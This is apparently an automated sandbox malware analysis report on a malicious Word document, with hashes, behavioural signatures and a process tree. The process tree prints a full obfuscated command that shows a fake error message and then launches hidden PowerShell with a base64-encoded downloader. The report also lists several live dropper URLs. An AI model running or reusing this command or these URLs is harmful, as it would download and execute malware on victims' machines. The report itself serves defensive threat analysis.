Analysis

  • max time kernel
    64s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 08:37

General

  • Target

    2020-29-12-76862.doc

  • Size

    157KB

  • MD5

    ac83017cd1c54fbe30b8c3a9ae6afb43

  • SHA1

    8c83cfe2ae34701a1fcfbcaf7cb4b05a346d7587

  • SHA256

    d3223160125e699dcc3187c07eac467b90e23023885f0b5434e4dccb1c176600

  • SHA512

    fbd0dd49a940f9e6db7e730fd59c698b536fe49b4bea732055243aee6d7523dd4b678c0933c6e7830237f1cb8f1854a0c01c320671b6938fc94c94ac9a2f4a7f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://thespaceastronauts.com/wp-content/j/

exe.dropper

http://sanghuangvip.com/wp-admin/7ezn/

exe.dropper

https://www.scooterinsurance.co.uk/wp-includes/m/

exe.dropper

http://nasabatam.bbtbatam.com/wp-admin/QwZXR/

exe.dropper

http://4k-iptv.eu/joinery-companies-hz4lm/T6wpd/

exe.dropper

https://technicalashish.in/wp-admin/M/

exe.dropper

https://ilmeteo.dev.keyformat.it/tpl/GB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020-29-12-76862.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:336
    • C:\Windows\system32\cmd.exe
      cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAkAGQASgBXACAAPQAgACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANQB9AHsAMwB9AHsAMgB9AHsAMQB9AHsANAB9ACIALQBmACcAUwBZAFMAVABlAG0ALgAnACwAJwBUACcALAAnAGMAJwAsACcAZQAnACwAJwBvAFIAeQAnACwAJwBJAE8ALgBEAGkAcgAnACkAIAAgADsAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAcgBJAGEAQgBsAGUAOgB4AGUAVwAgACAAKAAgACAAWwB0AHkAUABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcATgBhAEcARQBSACcALAAnAHMAWQBTAFQARQBNAC4AbgBlAFQAJwAsACcARQBwAE8ASQBuAFQATQAnACwAJwBBACcALAAnAC4AUwBFAFIAdgBpAEMAJwApACAAKQAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAJwApACsAJwBlAG4AJwArACgAJwB0AGwAeQAnACsAJwBDAG8AbgB0ACcAKQArACcAaQAnACsAKAAnAG4AJwArACcAdQBlACcAKQApADsAJABNAGkAOAA1AHYAZwA5AD0AJABVADEAMwBUACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABNADkAMwBUADsAJABTADIAMwBSAD0AKAAnAEsAJwArACgAJwA0ACcAKwAnADEARQAnACkAKQA7ACAAIAAoACAAbABTACAAVgBhAFIASQBhAGIAbABFADoARABqAHcAIAAgACkALgBWAEEATABVAEUAOgA6ACIAQwBSAGAAZQBBAFQAYABFAEQASQByAGAARQBDAHQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAG8ASgBDACcAKwAnAEoAcQAnACsAJwBwAGMAJwApACsAKAAnAG0AYgBwACcAKwAnAG8ASgBDACcAKwAnAEoAJwApACsAKAAnAGMAMgB2ACcAKwAnAG0AaABwACcAKQArACgAJwBvACcAKwAnAEoAQwAnACkAKQAuACIAcgBgAGUAUABsAGEAQwBFACIAKAAoAFsAYwBoAEEAUgBdADEAMQAxACsAWwBjAGgAQQBSAF0ANwA0ACsAWwBjAGgAQQBSAF0ANgA3ACkALAAnAFwAJwApACkAKQA7ACQAQwAxADgAVAA9ACgAKAAnAEoAXwAnACsAJwAyACcAKQArACcAUwAnACkAOwAgACgAIABJAHQARQBtACAAIABWAEEAUgBJAGEAQgBMAGUAOgB4AGUAVwAgACkALgB2AEEAbAB1AGUAOgA6ACIAcwBlAGMAVQBgAFIAaQBgAFQAWQBgAHAAcgBPAFQATwBDAE8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQARAA0ADkASAA9ACgAJwBPACcAKwAoACcAMAAnACsAJwAzAE8AJwApACkAOwAkAFQAZAB5AG0AaAByAHcAIAA9ACAAKAAnAFMAJwArACgAJwAyADQAJwArACcAUgAnACkAKQA7ACQASQAxADgATQA9ACgAJwBGACcAKwAoACcANAAxACcAKwAnAFAAJwApACkAOwAkAE8AbAB1AHQAawBzAGYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBKAHEAcABjAG0AYgBwAHsAMAAnACsAJwB9AEoAYwAyAHYAbQBoAHAAJwArACcAewAnACsAJwAwAH0AJwApACAALQBmACAAIABbAEMAaABhAFIAXQA5ADIAKQArACQAVABkAHkAbQBoAHIAdwArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFMANQA2AEMAPQAoACcATQA3ACcAKwAnADYAVAAnACkAOwAkAEQAMABiAGEANgB4ADQAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAcwA6AC8ALwB0AGgAJwArACcAZQAnACsAJwBzACcAKQArACcAcABhACcAKwAnAGMAJwArACgAJwBlACcAKwAnAGEAcwB0AHIAbwBuAGEAdQB0AHMAJwArACcALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtACcAKwAnAC8AdwAnACsAJwBwAC0AJwArACcAYwAnACsAKAAnAG8AbgB0AGUAJwArACcAbgB0AC8AJwApACsAKAAnAGoALwBAAF0AYgAyAFsAJwArACcAcwAnACsAJwA6AC8ALwBzACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBoAHUAJwApACsAKAAnAGEAJwArACcAbgBnAHYAJwApACsAKAAnAGkAcAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwAC0AYQBkAG0AJwArACcAaQBuAC8AJwApACsAKAAnADcAZQB6AG4AJwArACcALwBAACcAKQArACgAJwBdAGIAMgBbACcAKwAnAHMAcwA6AC8AJwArACcALwB3AHcAdwAuACcAKwAnAHMAYwAnACkAKwAnAG8AbwAnACsAKAAnAHQAJwArACcAZQByACcAKQArACgAJwBpAG4AcwB1ACcAKwAnAHIAJwApACsAJwBhACcAKwAnAG4AYwAnACsAJwBlACcAKwAoACcALgBjAG8ALgAnACsAJwB1ACcAKQArACcAawAvACcAKwAoACcAdwBwAC0AJwArACcAaQAnACsAJwBuAGMAbAB1AGQAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwAvAG0ALwAnACsAJwBAAF0AJwArACcAYgAyACcAKwAnAFsAcwA6AC8ALwAnACkAKwAoACcAbgAnACsAJwBhAHMAYQAnACkAKwAnAGIAJwArACgAJwBhAHQAJwArACcAYQBtAC4AJwApACsAJwBiACcAKwAoACcAYgB0AGIAJwArACcAYQAnACkAKwAoACcAdABhACcAKwAnAG0ALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvACcAKwAnAFEAJwArACcAdwBaAFgAJwApACsAJwBSAC8AJwArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAcwA6ACcAKwAnAC8ALwAnACsAJwA0AGsAJwArACcALQAnACsAJwBpAHAAdAB2AC4AZQB1AC8AJwArACcAagAnACsAJwBvAGkAbgBlAHIAeQAnACkAKwAoACcALQBjACcAKwAnAG8AbQBwAGEAbgBpAGUAcwAtAGgAJwArACcAegA0AGwAJwArACcAbQAnACsAJwAvAFQAJwArACcANgB3AHAAZAAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyACcAKQArACgAJwBbAHMAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdABlAGMAJwApACsAJwBoACcAKwAoACcAbgBpACcAKwAnAGMAJwApACsAKAAnAGEAbABhACcAKwAnAHMAaABpACcAKQArACgAJwBzAGgALgAnACsAJwBpAG4ALwAnACsAJwB3AHAALQAnACsAJwBhAGQAbQBpAG4ALwBNAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAJwArACcAWwBzAHMAOgAvACcAKQArACgAJwAvACcAKwAnAGkAbABtAGUAJwArACcAdABlAG8AJwArACcALgBkAGUAdgAnACkAKwAoACcALgAnACsAJwBrAGUAJwApACsAKAAnAHkAZgBvACcAKwAnAHIAbQBhACcAKwAnAHQAJwApACsAKAAnAC4AaQAnACsAJwB0ACcAKQArACcALwB0ACcAKwAoACcAcABsACcAKwAnAC8ARwAnACkAKwAnAEIALwAnACkALgAiAHIARQBQAGwAYQBgAGMARQAiACgAKAAnAF0AJwArACgAJwBiADIAJwArACcAWwBzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQASwA0AF8AUQAgACsAIAAkAE0AaQA4ADUAdgBnADkAIAArACAAJABNADIANgBIACkAOwAkAFgAOQAxAEsAPQAoACcASAAnACsAKAAnADQAJwArACcAOABKACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAG0AZgBoAG0AZAByACAAaQBuACAAJABEADAAYgBhADYAeAA0ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAJwArACcAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABTAFkAcwB0AGUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkAZQBuAFQAKQAuACIARABgAG8AdwBgAE4AYABsAG8AQQBkAGYAaQBsAGUAIgAoACQAUwBtAGYAaABtAGQAcgAsACAAJABPAGwAdQB0AGsAcwBmACkAOwAkAFYANAAzAFQAPQAoACcARQA1ACcAKwAnADIAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATwBsAHUAdABrAHMAZgApAC4AIgBMAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADMAOAAxADQANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABPAGwAdQB0AGsAcwBmACwAKAAoACcAQwBvACcAKwAnAG4AdAByAG8AJwArACcAbAAnACkAKwAnAF8AJwArACcAUgB1ACcAKwAoACcAbgAnACsAJwBEAEwATAAnACkAKQAuACIAVABPAFMAYABUAFIAaQBOAGcAIgAoACkAOwAkAFIANwAyAFgAPQAoACcARQAxACcAKwAnADUAVwAnACkAOwBiAHIAZQBhAGsAOwAkAFcAOAA2AFEAPQAoACcASgAnACsAKAAnADIAOQAnACsAJwBIACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADIAXwBUAD0AKAAnAEIAMgAnACsAJwA1AFcAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\system32\msg.exe
        msg Admin /v Word experienced an error trying to open the file.
        2⤵
          PID:1352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POwersheLL -w hidden -ENCOD IAAkAGQASgBXACAAPQAgACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANQB9AHsAMwB9AHsAMgB9AHsAMQB9AHsANAB9ACIALQBmACcAUwBZAFMAVABlAG0ALgAnACwAJwBUACcALAAnAGMAJwAsACcAZQAnACwAJwBvAFIAeQAnACwAJwBJAE8ALgBEAGkAcgAnACkAIAAgADsAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAcgBJAGEAQgBsAGUAOgB4AGUAVwAgACAAKAAgACAAWwB0AHkAUABFAF0AKAAiAHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9ACIALQBmACcATgBhAEcARQBSACcALAAnAHMAWQBTAFQARQBNAC4AbgBlAFQAJwAsACcARQBwAE8ASQBuAFQATQAnACwAJwBBACcALAAnAC4AUwBFAFIAdgBpAEMAJwApACAAKQAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAJwApACsAJwBlAG4AJwArACgAJwB0AGwAeQAnACsAJwBDAG8AbgB0ACcAKQArACcAaQAnACsAKAAnAG4AJwArACcAdQBlACcAKQApADsAJABNAGkAOAA1AHYAZwA5AD0AJABVADEAMwBUACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABNADkAMwBUADsAJABTADIAMwBSAD0AKAAnAEsAJwArACgAJwA0ACcAKwAnADEARQAnACkAKQA7ACAAIAAoACAAbABTACAAVgBhAFIASQBhAGIAbABFADoARABqAHcAIAAgACkALgBWAEEATABVAEUAOgA6ACIAQwBSAGAAZQBBAFQAYABFAEQASQByAGAARQBDAHQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAG8ASgBDACcAKwAnAEoAcQAnACsAJwBwAGMAJwApACsAKAAnAG0AYgBwACcAKwAnAG8ASgBDACcAKwAnAEoAJwApACsAKAAnAGMAMgB2ACcAKwAnAG0AaABwACcAKQArACgAJwBvACcAKwAnAEoAQwAnACkAKQAuACIAcgBgAGUAUABsAGEAQwBFACIAKAAoAFsAYwBoAEEAUgBdADEAMQAxACsAWwBjAGgAQQBSAF0ANwA0ACsAWwBjAGgAQQBSAF0ANgA3ACkALAAnAFwAJwApACkAKQA7ACQAQwAxADgAVAA9ACgAKAAnAEoAXwAnACsAJwAyACcAKQArACcAUwAnACkAOwAgACgAIABJAHQARQBtACAAIABWAEEAUgBJAGEAQgBMAGUAOgB4AGUAVwAgACkALgB2AEEAbAB1AGUAOgA6ACIAcwBlAGMAVQBgAFIAaQBgAFQAWQBgAHAAcgBPAFQATwBDAE8AbAAiACAAPQAgACgAKAAnAFQAbABzACcAKwAnADEAJwApACsAJwAyACcAKQA7ACQARAA0ADkASAA9ACgAJwBPACcAKwAoACcAMAAnACsAJwAzAE8AJwApACkAOwAkAFQAZAB5AG0AaAByAHcAIAA9ACAAKAAnAFMAJwArACgAJwAyADQAJwArACcAUgAnACkAKQA7ACQASQAxADgATQA9ACgAJwBGACcAKwAoACcANAAxACcAKwAnAFAAJwApACkAOwAkAE8AbAB1AHQAawBzAGYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBKAHEAcABjAG0AYgBwAHsAMAAnACsAJwB9AEoAYwAyAHYAbQBoAHAAJwArACcAewAnACsAJwAwAH0AJwApACAALQBmACAAIABbAEMAaABhAFIAXQA5ADIAKQArACQAVABkAHkAbQBoAHIAdwArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFMANQA2AEMAPQAoACcATQA3ACcAKwAnADYAVAAnACkAOwAkAEQAMABiAGEANgB4ADQAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAcwA6AC8ALwB0AGgAJwArACcAZQAnACsAJwBzACcAKQArACcAcABhACcAKwAnAGMAJwArACgAJwBlACcAKwAnAGEAcwB0AHIAbwBuAGEAdQB0AHMAJwArACcALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtACcAKwAnAC8AdwAnACsAJwBwAC0AJwArACcAYwAnACsAKAAnAG8AbgB0AGUAJwArACcAbgB0AC8AJwApACsAKAAnAGoALwBAAF0AYgAyAFsAJwArACcAcwAnACsAJwA6AC8ALwBzACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBoAHUAJwApACsAKAAnAGEAJwArACcAbgBnAHYAJwApACsAKAAnAGkAcAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwBwAC0AYQBkAG0AJwArACcAaQBuAC8AJwApACsAKAAnADcAZQB6AG4AJwArACcALwBAACcAKQArACgAJwBdAGIAMgBbACcAKwAnAHMAcwA6AC8AJwArACcALwB3AHcAdwAuACcAKwAnAHMAYwAnACkAKwAnAG8AbwAnACsAKAAnAHQAJwArACcAZQByACcAKQArACgAJwBpAG4AcwB1ACcAKwAnAHIAJwApACsAJwBhACcAKwAnAG4AYwAnACsAJwBlACcAKwAoACcALgBjAG8ALgAnACsAJwB1ACcAKQArACcAawAvACcAKwAoACcAdwBwAC0AJwArACcAaQAnACsAJwBuAGMAbAB1AGQAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwAvAG0ALwAnACsAJwBAAF0AJwArACcAYgAyACcAKwAnAFsAcwA6AC8ALwAnACkAKwAoACcAbgAnACsAJwBhAHMAYQAnACkAKwAnAGIAJwArACgAJwBhAHQAJwArACcAYQBtAC4AJwApACsAJwBiACcAKwAoACcAYgB0AGIAJwArACcAYQAnACkAKwAoACcAdABhACcAKwAnAG0ALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKQArACgAJwBwAC0AJwArACcAYQAnACkAKwAoACcAZABtACcAKwAnAGkAbgAvACcAKwAnAFEAJwArACcAdwBaAFgAJwApACsAJwBSAC8AJwArACcAQAAnACsAJwBdACcAKwAoACcAYgAyACcAKwAnAFsAcwA6ACcAKwAnAC8ALwAnACsAJwA0AGsAJwArACcALQAnACsAJwBpAHAAdAB2AC4AZQB1AC8AJwArACcAagAnACsAJwBvAGkAbgBlAHIAeQAnACkAKwAoACcALQBjACcAKwAnAG8AbQBwAGEAbgBpAGUAcwAtAGgAJwArACcAegA0AGwAJwArACcAbQAnACsAJwAvAFQAJwArACcANgB3AHAAZAAnACkAKwAoACcALwAnACsAJwBAAF0AYgAyACcAKQArACgAJwBbAHMAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AJwArACcAdABlAGMAJwApACsAJwBoACcAKwAoACcAbgBpACcAKwAnAGMAJwApACsAKAAnAGEAbABhACcAKwAnAHMAaABpACcAKQArACgAJwBzAGgALgAnACsAJwBpAG4ALwAnACsAJwB3AHAALQAnACsAJwBhAGQAbQBpAG4ALwBNAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAJwArACcAWwBzAHMAOgAvACcAKQArACgAJwAvACcAKwAnAGkAbABtAGUAJwArACcAdABlAG8AJwArACcALgBkAGUAdgAnACkAKwAoACcALgAnACsAJwBrAGUAJwApACsAKAAnAHkAZgBvACcAKwAnAHIAbQBhACcAKwAnAHQAJwApACsAKAAnAC4AaQAnACsAJwB0ACcAKQArACcALwB0ACcAKwAoACcAcABsACcAKwAnAC8ARwAnACkAKwAnAEIALwAnACkALgAiAHIARQBQAGwAYQBgAGMARQAiACgAKAAnAF0AJwArACgAJwBiADIAJwArACcAWwBzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAUwBgAFAAbABpAFQAIgAoACQASwA0AF8AUQAgACsAIAAkAE0AaQA4ADUAdgBnADkAIAArACAAJABNADIANgBIACkAOwAkAFgAOQAxAEsAPQAoACcASAAnACsAKAAnADQAJwArACcAOABKACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAG0AZgBoAG0AZAByACAAaQBuACAAJABEADAAYgBhADYAeAA0ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAJwArACcAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABTAFkAcwB0AGUATQAuAE4AZQBUAC4AVwBFAGIAQwBsAGkAZQBuAFQAKQAuACIARABgAG8AdwBgAE4AYABsAG8AQQBkAGYAaQBsAGUAIgAoACQAUwBtAGYAaABtAGQAcgAsACAAJABPAGwAdQB0AGsAcwBmACkAOwAkAFYANAAzAFQAPQAoACcARQA1ACcAKwAnADIAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQATwBsAHUAdABrAHMAZgApAC4AIgBMAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADMAOAAxADQANQApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAbAAnACsAJwAzADIAJwApACAAJABPAGwAdQB0AGsAcwBmACwAKAAoACcAQwBvACcAKwAnAG4AdAByAG8AJwArACcAbAAnACkAKwAnAF8AJwArACcAUgB1ACcAKwAoACcAbgAnACsAJwBEAEwATAAnACkAKQAuACIAVABPAFMAYABUAFIAaQBOAGcAIgAoACkAOwAkAFIANwAyAFgAPQAoACcARQAxACcAKwAnADUAVwAnACkAOwBiAHIAZQBhAGsAOwAkAFcAOAA2AFEAPQAoACcASgAnACsAKAAnADIAOQAnACsAJwBIACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADIAXwBUAD0AKAAnAEIAMgAnACsAJwA1AFcAJwApAA==
          2⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1148

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/336-11-0x0000000000000000-mapping.dmp
      • memory/1148-3-0x0000000000000000-mapping.dmp
      • memory/1148-4-0x000007FEF57B0000-0x000007FEF619C000-memory.dmp
        Filesize

        9.9MB

      • memory/1148-5-0x0000000001F50000-0x0000000001F51000-memory.dmp
        Filesize

        4KB

      • memory/1148-6-0x000000001AB30000-0x000000001AB31000-memory.dmp
        Filesize

        4KB

      • memory/1148-7-0x00000000024F0000-0x00000000024F1000-memory.dmp
        Filesize

        4KB

      • memory/1148-8-0x0000000001DD0000-0x0000000001DD1000-memory.dmp
        Filesize

        4KB

      • memory/1148-9-0x000000001B620000-0x000000001B621000-memory.dmp
        Filesize

        4KB

      • memory/1148-10-0x000000001C100000-0x000000001C101000-memory.dmp
        Filesize

        4KB

      • memory/1352-2-0x0000000000000000-mapping.dmp